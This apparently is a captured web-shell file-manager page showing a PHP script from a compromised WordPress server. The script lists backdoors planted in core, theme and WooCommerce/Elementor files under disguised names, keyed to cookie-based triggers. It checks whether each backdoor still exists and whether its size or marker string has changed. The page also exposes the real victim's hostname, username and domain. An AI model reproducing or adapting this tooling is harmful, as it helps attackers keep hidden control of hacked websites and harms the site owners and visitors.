HEX
Server: Apache/2
System: Linux vps.uva06 3.10.0-1160.118.1.el7.x86_64 #1 SMP Wed Apr 24 16:01:50 UTC 2024 x86_64
User: noithat7 (1010)
PHP: 7.4.30
Disabled: NONE
Upload Files
File: //tmp/.sys
<?php   $r = '/home/noithat7/domains/noithat7.com/private_html'; $x = ["/index.php"=>"bd@@127011046@@$_COOKIE[-",
"/wp-content/themes/twentytwentyfour/patterns/patterns/index.php"=>"bd@@147553959@@reverse_searcher",
"/wp-admin/plugin-editor.php"=>"bd@@137317203@@_COOKIE[3]",
"/wp-admin/load-scripts.php"=>"bd@@137318667@@Content-Security-Policy",
"/wp-admin/options.php"=>"bd@@137316917@@_COOKIE[3]",
"/wp-admin/css/css/index.php"=>"bd@@147568837@@19",
"/wp-content/themes/twentytwentyfive/assets/fonts/platypi/platypi/cache.php"=>"bd@@147568982@@43",
"/wp-blog-header.php"=>"bd@@152703009@@_COOKIE[3]",
"/wp-content/plugins/woocommerce/includes/class-wc-product-variable.php"=>"bd@@127012106@@_COOKIE[3]",
"/wp-content/plugins/woocommerce/packages/action-scheduler/classes/abstracts/ActionScheduler.TimezoneHelper.Schedule.php"=>"bd@@127016999@@423",
"/wp-content/plugins/elementor/core/editor/loader/v1/templates/editor.body.v1.view.php"=>"bd@@127068024@@1641",
"/wp-content/plugins/woocommerce/includes/class-wc-datetime.php"=>"bd@@127064431@@splitter_tool",
"/wp-content/plugins/woocommerce/src/Admin/Features/Navigation/pical_new_event.php"=>"bd@@127032965@@716",
"/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Integrations/report_unittest.php"=>"bd@@127017402@@233"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');